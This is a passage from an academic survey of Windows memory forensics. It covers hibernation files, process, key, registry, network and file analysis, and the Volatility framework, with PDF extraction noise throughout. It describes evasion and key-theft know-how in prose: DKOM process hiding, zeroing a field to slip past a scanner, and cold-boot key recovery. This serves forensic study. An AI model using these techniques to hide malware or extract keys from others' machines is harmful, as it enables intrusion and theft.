that revives the host system environment after cutting powerand provides the investigator with an interactive shell toretrieve state-related system data. Most of the projects are stillin a state of flux though and are not designed to be used indaily practice yet.
3.9. Memory acquisition using the hibernation file
The Windows hibernation file ( hiberfil.sys ) is increasingly
regarded as another source of valuable information ( Carrier
and Grand, 2004; Schatz, 2007a; Libster and Kornblum, 2008;Ruff, 2008; Zhao and Cao, 2009 ). It is stored in the root direc-
tory on the same partition Microsoft Windows is installed onand contains runtime-specific information. When the oper-ating system is about to enter an energy-saving sleep modeand is suspended to disk, the system state is frozen, anda snapshot of the existing working set is preserved. Thus, incontrast to many other software-based solutions we havedescribed, investigators are able to capture a consistent andatomically-generated image of volatile data. However, it isimportant to note that the file cannot be used to reproduce the
state of physical memory in its entirety as “for hibernation,
the goal is to intelligently decide which pages are saved in thehibernation file” ( Russinovich et al., 2009 , p. 840). Hence, the
quantity and quality of extracted pieces of evidence may belimited. In addition, the hibernation file is compressed inorder to save disk space and uses a proprietary format whichhas long impeded thorough understanding and applicability
in forensic investigations. Details about its structure have
been discussed in more recent publications though ( Suiche,
2008a ). A working prototype that is capable of converting the
file to raw dump format as well as reading and writing specificmemory sections was developed in the course of the SandMan
project ( Ruff and Suiche, 2007; Suiche, 2008b ). At the time of
this writing, it has been superseded by MoonSols (MoonSols,
2010 ). The commercial version supports the entire family of
Windows operating systems, including both 32- and 64-bitversions.
4. Analysis of the acquired memory image
After a forensic copy of physical memory has been generatedwith one of the techniques outlined in the previous sections,an in-depth analysis of the acquired data can begin. Primitiveapproaches that are described in the literature rely on simplestring searches, e.g., with command line utilities such as
strings and grep or more powerful applications such as
WinHex (X-Ways Software Technology AG, 2010 ), to look for
suspicious patterns, usernames, passwords, and other textual
representations in the created image ( Stover and Dickerson,
2005; Zhao and Cao, 2009 ). While these methods are easy to
apply, they are also noisy, cause a huge overhead, and lead toa large number of false positives (Beebe and Dietrich, 2007) .
Beebe and Clark (2007 , p. S49) argue that “[f]requently, inves-
tigators are left to wade through hundreds of thousands ofsearch hits for even reasonably small queries [ .]emost of
which [ .] are irrelevant to investigative objectives”. Even
when string searches produce quite accurate results, theytypically do not take into account the context of the respectiveinformation and, as a consequence, are of limited help to theinvestigation process. For instance, as Savoldi and Gubian
(2008 , p. 16) point out, “the retrieval of a potentially compro-
mising string (e.g. ‘child porn’) certainly provides evidence if
found in the memory assigned to a process l[a]unched by theuser, but it would be likely rejected by jury if that memorybelonged to a piece of malware”. In addition, Hejazi et al.
(2009 , p. S123) note that the “existence of unknown sensitive
data in the memory is the main important limitation of this
method”. Thus, a forensic analyst may, for example, solely
look for specific keywords, but at the same time, disregard“names, addresses, user IDs, and strings that are not presentin the list the investigator is looking for while they are presentin the memory dump and are of paramount importance forthe investigative case” ( Hejazi et al., 2009 , p. S123). In sum,
these procedures are not sufficiently reliable with regard toa forensic investigation. Efficient solutions to these problemshave been developed over the last years but are not furtherillustrated in the remainder of this paper since they fall in thearea of information retrieval (IR) and text mining tasks. Goodintroductions to these topics have been compiled by Beebe
and Clark (2007) as well as Roussev and Richard III (2004)
though.
As a viable alternative to string searching algorithms,
security professionals recommend a more structured meth-
odology to find valuable traces in memory. It involves exam-ining what types of data may be contained within a captureddigital investigation 8 (2011) 3 e22 11
image, how these types are defined, and where they are
located. Relevant pieces of information are generally stored in
the system or user address space, either directly in RAM or in
the local page file, and include ( Hoglund, 2008; Sutherland
et al., 2008 )
/C15the list of running system processes and possibly installedmalicious software applications,
/C15cryptographic keys,
/C15the system registry,
/C15established network connections and network-related datasuch as IP addresses and port information,
/C15open files, and
/C15system state- and application-related data such as thecommand history, date and timestamp information.
The prevailing techniques to recover the specified artifacts
are subject of the following sections.
4.1. Process analysis
An essential part of a forensic investigation is checking theintegrity of the operating system on the suspect machine anddistinguishing legitimate components from suspicious andpotentially malicious applications. Thus, the identificationand sound examination of running processes becomes “abasic security task that is a prerequisite for many other types
of analysis” ( Dolan-Gavitt et al., 2009 , p. 2).
Early approaches attempted to parse internal system
resources to enumerate the list of loaded programs ( Burdach,
2005; Betz, 2006; Garner, 2007 ). However, as various authors
point out, an increasing number of malware executables use so-
called rootkit techniques and subvert integral system structures
to avoid detection ( Aquilina et al., 2008; Ligh et al., 2010 ). For
instance, the FUrootkit ( Butler, 2005 )i m p l e m e n t sam e t h o d
known as Direct Kernel Object Manipulation (DKOM) to unlink itself
from the ActiveProcessLinks list, a member of the _EPROCESS
(executive process ) block every process is represented by ( Bilby,
2006 ). This operation is illustrated in Fig. 6 (b), the skull icon
over the second structure indicates the malicious rootkit
process. Due to these interventions, list and table walkingsolutions are likely to fail and must not be seen as reliable.
In order to cope with these issues, Schuster (2006d) devel-
oped a signature-based scanner. It uses a set of rules that
precisely describe the structure of a system process or thread,respectively. A sample signature is illustrated in Listing 1 .I n
the given example, it is checked that the page directory is
aligned at a page boundary, the control structures of theworking thread are contained in kernel space, and the fields of
theDISPATCHER_HEADER structure match pre-defined values.
Fig. 6 eSubversion of a Process List Using Direct Kernel Object Manipulation (DKOM). (a) Structure of the Process List Before
a DKOM Attack. (b) Structure of the Process List After a DKOM Attack.digital investigation 8 (2011) 3 e22 12
The results of the scanner can be compared with the output
of the standard process list in the next step. Differences and
anomalies potentially indicate the presence of a maliciousprogram and need to be inspected in more detail. Similarstrategies are proposed by Walters and Petroni (2007), Carr
(2006) , and Rutkowska (2005) .Walters and Petroni (2007 , p. 14)
note, however, that “a reliable pattern may rely on character-istics of an object that are not essential”. Consequently, anadversary may change the value of a non-essential field of the
process object without affecting the stability of the underlyingoperating system. For instance, in the case of Listing 1 , it is also
possible to set the value of the Size field to zero. Thereby, the
rule of the scanner is circumvented, and the respective processbecomes invisible. To prevent such scenarios, Dolan-Gavitt
et al. (2009) have created so-called robust signatures which
are solely based on fields that are critical to system function-ality. A manipulation of such a field leads to an automaticsystem crash and, thus, renders an attack useless. With regardto the core _EPROCESS structure outlined above, 72 fields (out of
221) suffice this requirement and, therefore, form strongcandidates for a process signature.
8
An alternative method is suggested by Zhang et al. (2009,
2010) . The authors use a combination of scanning and list
traversing techniques that rely on the Kernel Processor Control
Region (KPCR). This region stores processor-specific data and
contains a separate block, the KPRCB , that, for instance, saves
CPU-related statistics as well as scheduling information aboutthe current and next thread ( Russinovich et al., 2009 ). With the
help of this information, the corresponding process list can berestored as follows ( Barbosa, 2005; Ionescu, 2005; Dolan-Gavitt,
2008b ): The KPCR includes a field KdVersionBlock that points
to a_DBGKD_GET_VERSION64 structure that, in turn, references
the undocumented _KDDEBUGGER_DATA64 structure. Part of this
structure is the global variable PSActiveProcessHead that
serves as a pointer to the list of active _EPROCESS structures.
In Microsoft Windows XP, both the KPCR and KPRCB are
located at fixed addresses ( 0xFFDFF000 and 0xFFDFF120 ,
respectively). In later versions, the base addresses aredynamically computed. Since the KPCR structure is self-referencing (offset 0x1C ) and the KPRCB starts at offset
0x120 , a simple signature can be generated though to discover
the structures and enumerate the running programs in thenext step ( Aumaitre, 2009 ).
4.2. Cryptographic key recovery
Due to the spread of (freely) available encryption technologies,security professionals are likely to increasingly encountersecured and password-protected files and disks in the future
(see Section 1). In case an investigator is unable to obtain the
desired information from the suspect, e.g., through social
engineering, the restoration of cryptographic keys from vola-tile memory may therefore become a central task in thecourse of a forensic analysis.
To solve this problem, different methods are proposed in
the literature: Hargreaves and Chivers (2008) describe a linear
memory scanning technique that moves through RAM onebyte at a time, using a block of bytes as the possible decryptionkey for the volume in question. The brute force-orientedprocedure does not require a deep understanding of the
underlying operating system and, thus, can be easily gener-
alized according to the authors. However, it cannot be directlyapplied if the key is split, i.e., is not stored in a contiguouspattern in memory.
Shamir and van Someren (1999) seek for sections of high
entropy to locate an RSA key within “gigabytes of data”. Thesolution exploits the mathematical properties of the crypto-graphic material. In contrast, the attack described by Klein
(2006a) is based on the observation that both private keys
and certificates are stored in standard formats. Klein (2006a)
constructs a simple search pattern to easily dump the secret
information from RAM. A pattern-like approach is also
implemented by Kaplan (2007) . His idea stems from the fact
that, for reasons of security, cryptographic keys are generallynot paged out to disk and, as a result, are typically saved in thenon-paged pool of the operating system (see Section 2.1). The
non-paged pool consists of a range of virtual addresses thatalways reside in physical memory (see also Russinovich et al.,
2009; Schuster, 2006b, 2008b ). Since in kernel space, memory
is a shared resource, allocated regions may be associated withan identifier, the so-called pool tag (Microsoft Corporation,
2010c ). Consequently, “a cryptosystem-specific signature,
consisting of the driver specific pool tag and pool allocationsize are all that is necessary to extract pool allocations con-taining key material from a memory dump with an acceptablysmall number of false positives” ( Kaplan, 2007 , p. 18). As an
alternative to the non-paged pool, it is possible to preventregions of virtual address space from being written out to diskby calling the VirtualLock function. Thereby, “[p]ages that
a process has locked remain in physical memory until theprocess unlocks them or terminates” ( Microsoft Corporation,
2010h ). Whether these mechanisms are relevant to the
forensic recovery of cryptographic keys has not been investi-gated to the best knowledge of the authors though.
Walters and Petroni (2007) outline a different concept that
relies on an analysis of publicly available source code. They
identify internal data structures that are responsible forholding the master key. As Maartmann-Moe et al. (2009 ,p .
S133) point out, Walter and Petroni “do, however, not describe
how to locate the different structures in memory, and neitherdo they discuss the fact that some of these may be paged out,thereby breaking the chain of data structures that leads to themaster key if only the memory dump is available for analysis”.
Last but not least, Halderman et al. (2009) suggest parsing
a computer’s memory for key schedules. The authors leverage
remanence effects in DRAM modules and launch a cold boot
attack on the target machine (see Section 3.8). After loading
a custom operating system, the volatile data is extracted, theListing 1 : Example of a process signature ( Schuster, 2006d )
PageDirectoryTable ! 1⁄40
PageDirectoryTable % 4096 1⁄41⁄40
(ThreadListHead . FLink >0 x7FFFFFFF) &&
(ThreadListHead . Blink >0 x7FFFFFFF)
DISPATCHER_HEADER . Type 1⁄41⁄40x03
DISPATCHER_HEADER . Size 1⁄41⁄40x1b
8After performing a fuzzing test, the number of strong signa-
ture candidates was reduced from 72 fields to 43 ( Dolan-Gavitt
et al., 2009).digital investigation 8 (2011) 3 e22 13
key material is retrieved, and the hard drive automatically
decrypted. The performance of this process is improved in the
works of Heninger and Shacham (2009) . Likewise, Tsow (2009)
presents an algorithm that is capable of recovering crypto-graphic information from memory images that are signifi-cantly decayed and is magnitudes faster than the originalmethod. Finally, Maartmann-Moe et al. (2009) extend the
conducted research on additional ciphers and illustrate thevulnerability of several well-known whole-disk and virtual-disk encryption utilities for these types of side-channeloperations. However, it is important to note that theseattacks can be mitigated by implementing cryptographic
algorithms entirely on the microprocessor. A corresponding
proof-of-concept application has been published by Mu ̈ller
et al. (2010) and has been further sophisticated more
recently ( Mu ̈ller et al., 2011 ).
4.3. System registry analysis
The Windows registry is a central, hierarchically-organized
repository for configuration options of the operating systemand third-party applications ( Microsoft Corporation, 2008 ). It
is internally structured into a set of so-called hives , i.e.,
discrete, treelike databases that hold groups of registry keysand corresponding values (see also Russinovich et al., 2009 ).
Most registry hives (e.g., HKLM\SYSTEM, HKLM\SOFTWARE ) are
persistently stored in the system32\config folder of the
operating system.
9However, a number of volatile hives (e.g.,
HKLM\HARDWARE ) are entirely maintained in RAM only and are
created every time the system is booted.
While the examination of on-disk registry data is a quite
established procedure for a forensic investigation to findpossible pieces of evidence ( Carvey, 2005; Mee et al., 2006;
Chang et al., 2007 ), a solely memory-based approach has
been documented by Dolan-Gavitt (2008c) only recently. In the
following, we give a short overview about the prevailingtechniques used in his work.
A registry hive consists of a so-called base block and
a number of hive bins (hbins). The base block with a fixed size
of 4 kB defines the start of the hive and contains a uniquesignature ( regf ) as well as additional meta information such
as a timestamp that saves the time of the last access opera-tion, an index to the first key, the RootCell , the internal file
name of the hive, and a checksum. A hive bin is typically 4 kBwide (or a multiple of it) and serves as a container for cells that,
in turn, store the actual registry data. Thus, to read a certain
key or value from RAM, the correct hive and corresponding
cell must be found first. The former task can be quite easilysolved by creating a hive-specific signature: Internally, a hiveis represented by a _CMHIVE structure which is allocated from
the paged pool of the system (see Section 2.1) and referenced
by the tag CM10 . Furthermore, it embeds a sub-structure
_HHIVE with the string constant 0xbee0bee0 . These pieces
of information are sufficient to construct a unique searchpattern and locate a hive in memory. To enumerate the entirelist of loaded hives, the HiveList member structure must besimply followed in the last step. It acts as a link between the
individual registry repositories.
Retrieving pre-defined keys or values from a memory
image is slightly more complex: Dolan-Gavitt (2008a) notes
that because “space for the hives is allocated out of the paged
pool, there is no way of guaranteeing that the memory allo-cated for the hive will continue to be contiguous”. For thisreason, a strategy is used that is similar to the virtual-to-physical address translation mechanism we have describedin Section 2.2. A cell is generally referenced by a cell index . This
field can be split into four different components. The firstelement, a one-bit flag, determines the stable (on-disk) or
volatile storage map for the hive which are both saved in the
_HHIVE sub-structure. With the help of the 10-bit directory
index, the correct entry in the cell map directory can be
located. The cell map directory refers to a cell map table with512 (2
9) entries that, in turn, point to the virtual address of the
target bin. Using the third and fourth component of the cellindex, the correct cell and cell information can be finallydiscovered (see Fig. 7 ).Dolan-Gavitt (2008e) has published
a proof-of-concept utility that is capable of extracting the list
of open keys and displaying the corresponding registry data.The software is freely-available for download and integrated
into the Volatility analysis framework that we will introduce in
more detail in a later section of this paper. It is, however,
important to emphasize that the techniques described aboveonly supplement traditional investigation methods. As laterversions of Microsoft Windows map only 16-KB portions ofa hive into RAM when they are needed ( Russinovich et al.,
2009 ), it is possible that “parts of the registry may have
never been brought into memory in the first place” and,consequently, “it cannot be assumed that the data found inmemory is complete” ( Dolan-Gavitt, 2008c , p. S30).
4.4. Network analaysis
Analyzing open network connections as well as inspectingincoming and outgoing network traffic is an integral part ofa forensic investigation and becomes particularly importantin the face of a potentially compromised system. Maliciousapplications typically bind to pre-defined ports and enableattackers to execute arbitrary commands on the target
machine, disable security protections, and upload or down-
load files ( Aquilina et al., 2008; Ligh et al., 2010 ). Contemporary
examples also include launching Distributed Denial of Service
(DDoS) attacks and consuming the resources of a host in orderto degrade its performance ( Peng et al., 2007 ). A vast number of
utilities, either for live response (e.g., TCPView (Russinovich,
2010 ),FPort (Foundstone, Inc., 2000 )) or post-mortem exami-
nation (e.g., PyFlag (Cohen, 2008 )), have been developed to
reveal such threats. Since many network-related data are alsotemporarily stored in RAM, memory forensic techniques canhelp correlate results with the tools described above in orderto gain a thorough understanding of an incident.
The first solution was suggested by Schuster (2006b) .H e
scans the non-paged pool of the operating system to findallocations for listening sockets. His algorithm is based ona unique pool tag ( TCPA , saved in little-endian format) and
a pre-defined pool size (368 bytes) that can be recovered afterdisassembling the tcpip.sys driver where the respective
9User-specific settings are saved in the file NTuser.dat that is
located in the %SystemDrive%\Documents and Setttings\
<username >folder.digital investigation 8 (2011) 3 e22 14
operating system functions are implemented in. Once the
appropriate addresses have been identified, the socket list can
be easily created. With a similar procedure, it is possible to
retrieve the list of open network connections.
A different methodology is described by Ligh et al. (2010)
and Okolica and Peterson (2010) : The authors locate two
internal hash tables (_AddrObjTable, _TCBTable) in the
tcpip.sys driver file. Each of the hash tables references
a singly linked list of objects that include information aboutthe IP address and port bindings.
10By traversing the lists as
shown in Fig. 8 , existing sockets and open network connec-
tions can be enumerated.
It is interesting to note that a malicious manipulation of
these lists, similar to the DKOM attack described in Section 4.1,
appears to hamper system functionality and, thus, is likely tobe detected in practice. For demonstration purposes, Ligh et al.
(2010) manually unlinked an object to hide the presence of
a listening socket. This operation disrupted the communica-tion process though, and connections could no longer beinitiated. From a forensic point of view, list crawling-basedapproaches can therefore be seen as reliable to date andpermit a legit and unaltered view of network activities.
4.5. File analysis
Similar to the examination of running system processes (seeSection 4.1), inspecting the list of open files and dynamicallyloaded libraries (DLLs) a program is referencing may be crucialto reveal suspicious activities in the course of an investigation.
For instance, an adversary might inject a malicious DLL in the
address space of a legitimate process by exploiting a remotevulnerability to hide her presence on the target machine(Miller and Turkulainen, 2006; Walters, 2006 ). As Walters
(2006 , p. 2) points out, these techniques “thwart conven-
tional forms of file system forensic analysis” and “are
commonly labeled as ‘anti-forensic’, since data is not writtento any non-volatile storage and [ .] would typically be lost
during common incident response procedures”. To counter
such threats, security professionals recommend analyzing theProcess Environment Block (PEB), a structure which lives in the
user address space and is part of every process (seeRussinovich et al., 2009 ). The Process Environment Block
contains a Ldr member with three doubly linked lists that
save the full name, size, and base address of all loadedlibraries.
11Simply enumerating the individual lists may thus
suffice to identify an injection attack. It is critical to stressthough that the approach can be subject to manipulation asvarious rootkit authors have demonstrated ( Darawk, 2005;
Kdm, 2004 ). For this reason, Dolan-Gavitt (2007a) proposes
an alternative methodology which is based on Virtual AddressDescriptors (VADs).
Fig. 7 eStructure of a Cell Index (Source: Dolan-Gavitt, 2008c , p. S28).
10Details about the structure of these objects can be found in the
work of Ligh et al. (2010) .11The three doubly linked lists ( InLoadOrderModuleList, In
MemoryOrderModuleList,InInitializationOrderModuleList )
contain the same modules but in different order. For more infor-
mation, please refer to Russinovich et al. (2009) .digital investigation 8 (2011) 3 e22 15
AVirtual Address Descriptor is a kernel data structure that is
maintained by the memory manager to keep track of allocated
memory ranges ( Russinovich et al., 2009 ). It stores information
about the start and end of the respective addresses as well as
additional access and descriptor flags. Each time a processreserves address space, a VAD is created and added to a self-balancing tree for maintenance reasons. A node in the tree isassociated with a pool tag and is of type _MMVAD_SHORT
(“VadS”), _MMVAD (“Vad”), or _MMVAD_LONG (“Vadl”) ( Dolan-
Gavitt, 2007a ). The latter two store a pointer to a _Control_
Area structure that, in turn, points to a _File_Object that
holds the unique file name (see the lower half of Fig. 9 ).
Consequently, the entire list of loaded modules can be
retrieved by traversing the VAD tree from top to bottom
and following the corresponding _Control_Area and
_File_Object references.
12Furthermore, it is possible to
reconstruct the contents of memory-mapped files, mostimportantly, executables. While it is unlikely to completelyrebuild the exact form of a binary due to changes in codevariables at runtime ( Kornblum, 2007a ), the recovered copy can
frequently be reverse engineered and inspected upon mali-cious behavior (see also Schuster, 2006c ). These operations
supplement traditional file carving techniques that areimplemented in utilities such as Foremost (United States Air
Force Office of Special Investigations, 2001 ) and Scalpel
(Richard III, 2006 ) and are suited for scenarios where an on-disk
restoration has failed. A proof-of-concept application has beenpublished by Dolan-Gavitt (2007b) and has been integrated into
the analysis framework Volatility that we will describe in depth
in Section 5.Van Baar et al. (2008) have extended these works
and developed a prototype that is capable of finding fileremnants in RAM even if the associated process hasterminated.
In spite of these features, it is important to emphasize that
the VAD tree itself may be the target of a compromise attempt.
An adversary with system privileges might, for instance,
remove a node from the tree, similar to the DKOM attackpresented in Section 4.1, or overwrite the pointer to the
_Control_Area structure, thereby effectively hiding a mali-
cious artifact from the forensic practices described above(Dolan-Gavitt, 2007a; Ligh et al., 2010 ). Even though we are not
aware of any malware species that leverage these types ofmodifications, sample code has been written that proves thedeficiencies of many security products offered on the marketto date ( NT Internals, 2009 ). Therefore, investigators should
evaluate data from various sources to obtain views from
multiple angles of the compromised system.
4.6. System state- and application-specific analysis
In addition to the pieces of evidence an investigator maycollect with the techniques described in the previous sections,a memory image frequently contains a myriad of information
about the system state that can be of great benefit to an
investigation. Especially the aforementioned _EPROCESS block
is a source of valuable data. For instance, the StartTime andPE Header
.text
.data
.rsrc_A ddrObjT abl e
_T CB T ableNe xt Ne xt 0
Ne xt Ne xt 0tcpip.sys
_ADDRESS_OBJECTList
_TCPT_OBJECTList
Fig. 8 eEnumerating the List of Socket and Connection Objects (Source: Based on Ligh et al., 2010 , p. 681).
VadS @80e2cd88
00190000 – 001a0000
VadS @80e20a88
00030000 – 00070000Vadl @ffa98178
01000000 – 01013000
FileObject @80e170e0
Name:
[...]\notepad.exeControlArea @80d502e0
Flags: Accessed,
HadUserReference,
Image, File... ... ... ...
Fig. 9 eVirtual Address Descriptor (VAD) Tree (Source:
Based on Dolan-Gavitt, 2007a ).12The root of the tree is saved in the VADRoot member of
a process’s _EPROCESS structure. Strategies to find this structure
in memory are explained in Section 4.1.digital investigation 8 (2011) 3 e22 16
ExitTime fields indicate the start and respective end time of
a process and may be parsed to create forensic timelines. In
addition, the periods an application has spent in system anduser mode can be derived from members of the kernel process(_KPROCESS ) block, a structure which is part of the _EPROCESS
environment (see Russinovich et al., 2009 ).Schuster (2008b)
has proven that these types of artifacts may be recoveredfrom RAM even after a program has terminated for more than24 h. Furthermore, with the help of the Token member, it is
possible to reconstruct the security context of an application. As
Russinovich et al. (2009 , p. 473) explain, “a security context
consists of information that describes the privileges,
accounts, and groups associated with the process or thread”.
Of particular interest is the list of user and group SIDs ( Security
Identifiers ) that eventually reveal the name of the user and
corresponding group account the executable was run as (seeDolan-Gavitt, 2008d ).
A different research focus is set by Stevens and Casey
(2010) . They dissect the structure of the DOSKEY utility that is
integrated into the command shell and permits editing pastcommands as well as displaying the command history. Thelatter is solely maintained in memory and is only accessible aslong as the command prompt is open. As Stevens and Casey
(2010 , p. S58) point out, “[i]n practice, this makes recovering
the command history difficult due to its volatile nature andthe low likelihood of finding an open command windowduring an investigation”, even though major parts “may berecoverable from memory for some time after the windowshas been closed”. The authors generate a unique signature forvarious DOSKEY elements and succeed in restoring command
history objects from a number of reference data sets,including intact lists of entered commands. As these “mightcontain the only retrievable traces of a deleted file or suspectactivity”, such types of examinations support other system
state-oriented investigation methods and “can provide
significant context into how and what occurred on [a] system”(Stevens and Casey, 2010 , p. S57).
While most approaches we have described so far target the
operating system architecture, “one of the issues currentlyfaced in the analysis of physical memory is the recovery anduse of application-level data” ( Simon and Slay, 2009 , p. 996). As
Simon and Slay (2010) argue, these steps become necessary
due to the increasing spread of anti-forensic technologies and
a trend toward online and network applications. However,research results in this area still remain sparse to date whichmay be partially due to the low lifespan of data loaded in the
user address space ( Solomon et al., 2007 ). Published solutions
mainly comprise instant messaging and Voice over IP (VoIP)
applications ( Gao and Cao, 2010; Simon and Slay, 2010 ). Other
security professionals have concentrated on finding remnants
of social communication platforms in RAM ( Bryner, 2009;
Drinkwater, 2009 ). With the growing use of these services,
additional and more advanced techniques are likely to bedeveloped in the future.
5. Volatility: a memory analysis framework
While most memory analysis utilities we have described inthe previous sections sophistically solve a specific problem,they were typically not designed with a holistic forensic
process in mind but rather as a proof-of-concept demonstra-
tion. As a consequence, many programs have their own userinterface, must be invoked with different command lineoptions, and generally neglect interprocess communicationwith other applications. In addition, some tools are OS-dependent and only work with specific platforms and config-urations. Vidas (2006) notes that, for instance, the structure of
the_EPROCESS block significantly differs across operating
system versions and service pack levels, rendering hard-coded address offsets in process scanners ineffective. Insum, these characteristics force security professionals to
thoroughly understand the scope and limitations of a myriad
of individual solutions, and great efforts must be made tocorrelate results and generate homogenous reports. Case et al.
(2008 , p. S65) argue, “[a]s the complexity of systems grows
rapidly, it becomes ever more difficult for an investigator to
perform thorough, reliable, and timely investigations".
In order to cope with these issues, Walters and Petroni
(2007) suggest integrating memory forensic techniques with
the digital investigation process model proposed by Carrier
and Spafford (2003) .A s Walters and Petroni (2007 , p. 2) point
out, the model “allows us to organize the way we think about,
discuss, and implement the procedure that are typically per-
formed during an investigation” and “forces us to think aboutall phases of an investigation and how the tools and tech-niques that are used during a digital investigation fit togetherto support the process”. Their work builds the foundation forthe forensic framework Volatility (Volatile Systems, LLC, 2008 )
which, in turn, has been embedded in several other applica-tion suites such as PyFlag (Cohen, 2008 ),DFF(ArxSys, 2009 ), or
PTK (DFlabs, 2010 ).Haruyama (2009) created a collection of
scripts to port Volatility to the commercially distributed Encase
environment.
With respect to its architecture, Volatility consists of
several core modules that are written in Python. The func-tionality of the application can be further extended with plug-ins that are provided by the developer community.
13Even
though earlier releases were solely capable of examiningimages of Microsoft Windows XP, the most recent branch (1.4)also supports current operating systems, including WindowsVista and Windows 7. An overview of important programfeatures can be seen in Appendix A , the complete list of
modules can be found in the work by Ligh et al. (2010) or when
running Volatility with the -h switch.
In sum, the framework implements a great part of the
concepts and methods we have outlined in this paper and has
already been successfully leveraged in different scenarios(DFRWS, 2008; Smith and Cote, 2010 ). Its architecture makes it
suitable for a high degree of memory forensic-related tasks.
However, it is also important to note that a high level ofexpertise is required to interpret extracted information andcorrelate results. Therefore, at the time of this writing, Vola-tility predominantly aims at academic researchers and secu-rity professionals with a strong technical background who areable to adapt the framework to their needs on a case-specificbasis.
13A comprehensive list of available plug-ins is maintained by
members of the Forensics Wiki project ( Forensics Wiki, 2010 ).digital investigation 8 (2011) 3 e22 17
6. Conclusion and future work
The volatile storage of a computer contains a plethora of
valuable information that may be key in the course of aninvestigation. Data found in RAM or in the system page filemay significantly contribute to the reconstruction of an inci-dent and therefore, supplement hard disk- and persistentmedia-oriented approaches in computer forensics. For thisreason, best practices should generally include preservingthose artifacts for later examination, correspondent to the
guidelines as proposed by Brezinski and Killalea (2002) .I n
sum, “during the forensic process as much attention must be
paid to volatile memory as is paid to the more traditionalsources of evidence” ( Maclean, 2006 , p. 29).
We have illustrated the prevalent concepts for creating
a memory snapshot of a running machine. However, securityprofessionals must also be aware of the scope and limitationsof the different technologies. Understanding the individualbenefits and drawbacks is crucial for choosing an adequateacquisition strategy. Particularly the impact of software-basedsolutions has been assessed only marginally at the time of this
writing and must still be evaluated in more detail.
The documentation and analysis of evidence found in
memory has received broad attention in research more
recently. As we have outlined in Section 5, existing solutions
are mainly problem-oriented to date though and frequently fail
to provide appropriate interfaces for data import/export tasksand correlating results. The Volatility framework we have
briefly described in the previous section addresses some ofthese issues and is capable of processing images in raw, crashdump, and hibernation file format. Due to its modular design,the functionality of the application can be easily extended if
necessary. Case et al. (2008 , p. S65) emphasize, however, that
“merely swamping the user with all available data [ .] falls
well short of what is actually needed” and “is not, by itself,
very useful”. Thus, it is also important to develop suitablevisualization techniques in order to properly present thecollected evidence. Only then will analysts fully recognizememory forensics as “a critical component of the digital crimescene” ( Walters and Petroni, 2007 , p. 15) and not as an addi-
tional burden that impedes the timely and cost-effective
completion of a case.
As we have argued in the introduction of this paper, we
expect the use of file and whole-disk encryption to dramati-
cally increase in the future, both in the private as well as
organizational sector. While citizens and institutions have thelegitimate right to protect their data and resources on the onehand, especially law enforcement officers must be able to copewith these technologies when it becomes necessary on theother hand. We have given an overview of current approachesfor recovering cryptographic keys from memory. We believethat these approaches still need to become more user-friendlyand be abstracted in a way they are understandable for andapplicable by technically less-sophisticated personnel.
Last but not least, with the growing number of Internet-
hosted services based on virtual machines (see Section 3.3),
analyzing the state of such an isolated system environment
also gets more important. This so-called virtual machine intro-
spection has come closer into the focus of researchers morerecently (e.g., see Dolan-Gavitt et al., 2011; Nance et al., 2009;
Hay and Nance, 2008 ) and is a field well worth exploring
from a forensic perspective.
Acknowledgments
We would like to thank Andreas Schuster for reading
a previous version of this paper and giving us detailed andhelpful suggestions for improvements. We would also like tothank Tilo Mu  ̈ller as well as Thomas Schreck for additional
feedback on our work.
Table A.1 eIntegral modules of the volatility memory
forensics framework
Module name Description
connections Locates the _TCBTable hash table in the
tcpip.sys driver file and traverses the
singly linked list of _TCPT_OBJECT entries
to enumerate open network connections
on the target system (see Section 4.4).
connscan2 Scans the non-paged pool of the operating
system for allocations that containinformation about open network
connections (see Section 4.4).
dlllist Retrieves the base address, size, and path
of all dynamically loaded libraries (DLLs)
that are referenced by a running
application. For this operation, the Ldr
structure of the Process Environment Block
(PEB) is parsed. It stores three doubly
linked lists of _LDR_DATA_TABLE_ENTRY
types that hold the respective information
(see Section 4.5).
files Retrieves the list of open file handles that is
maintained by a process (see Section 4.5).
getsids Reconstructs the security context of
a process to retrieve the list of user andgroup SIDs ( Security Identifiers ) the
application is associated with (see Section4.6).
hivelist Prints the virtual address and name of
hive structures that internally represent
parts of the system registry (see Section4.3).
hivescan Uses a signature-based approach to
search for _CMHIVE structures in memory.
These data types internally represent
parts of the system registry (see Section4.3).
imageinfo Displays various meta data about theimage, including the image type as well asthe creation date and time.
kpcrscan Scans a memory image for a _KPCR
structure that defines the Kernel Processor
Control Region . With the help of the
structure, it is for instance possible to
enumerate the list of running processes
on a machine (see Section 4.1).digital investigation 8 (2011) 3 e22 18
references
AccessData. Forensic toolkit 3, http://www.accessdata.com/
forensictoolkit.html ; 2010.
Aggarwal G, Bursztein E, Jackson C, Boneh D. An analysis of
private browsing modes in modern browsers. In: Proceedings
of the USENIX security symposium; 2010.
Apple Inc. Encrypting your home folder with filevault, http://docs.
info.apple.com/article.html?path 1⁄4Mac/10.5/en/8736.html ;
March 2010.Aquilina JM, Casey E, Malin CH. Malware forensics: investigating
and analyzing malicious code. Syngress Publishing; 2008.
ArxSys. Dff: digital forensics framework, http://www.arxsys.fr/ ;
2009.
Aumaitre D. A little journey inside windows memory. Journal in
Computer Virology 2009;5(2):105 e17.
Bo ̈ck B. Firewire-based physical security attacks on windows 7,
efs and bitlocker, http://www.securityresearch.at/publica
tions/windows7_firewire_physical_attacks.pdf ; 2009.
Barbosa E. Finding some non-exported kernel variables in
windows xp, http://www.rootkit.com/vault/Opc0de/GetVarXP.
pdf; 2005.
Becher M, Dornseif M, Klein CN. Firewire - all your memory are
belong to us. In: Proceedings of the annual CanSecWestapplied security conference; 2005.
Beebe NL, Clark JG. Digital forensic text string searching: improving
information retrieval effectiveness by thematically clusteringsearch results. Digital Investigation 2007;4(S1):49 e54.
Beebe N, Dietrich G. A new process model for text string
searching. In: Advances in digital forensics III. IFIPinternational federation for information processing. Boston:Springer; 2007. p. 179 e91.
Betz C. Memparser analysis tool, http://sourceforge.net/projects/
memparser/ ; July 2006.
Bilby D. Low down and dirty: anti-forensic rootkits. In:
Proceedings of Ruxcon 2006; 2006.
Boileau A. Firewire, dma & windows, http://www.storm.net.nz/
projects/16 ; 2006a.
Boileau A. Hit by a bus: physical access attacks with firewire. In:
Proceedings of Ruxcon 2006; 2006b.
Boileau A. winlockpwn, http://www.storm.net.nz/static/files/
winlockpwn ; 2008.
Brezinski D, Killalea T. Rfc3227-guidelines for evidence collection
and archiving, http://www.faqs.org/rfcs/rfc3227.html ;
February 2002.
Brosch T, Morgenstern M. Runtime packers ethe hidden
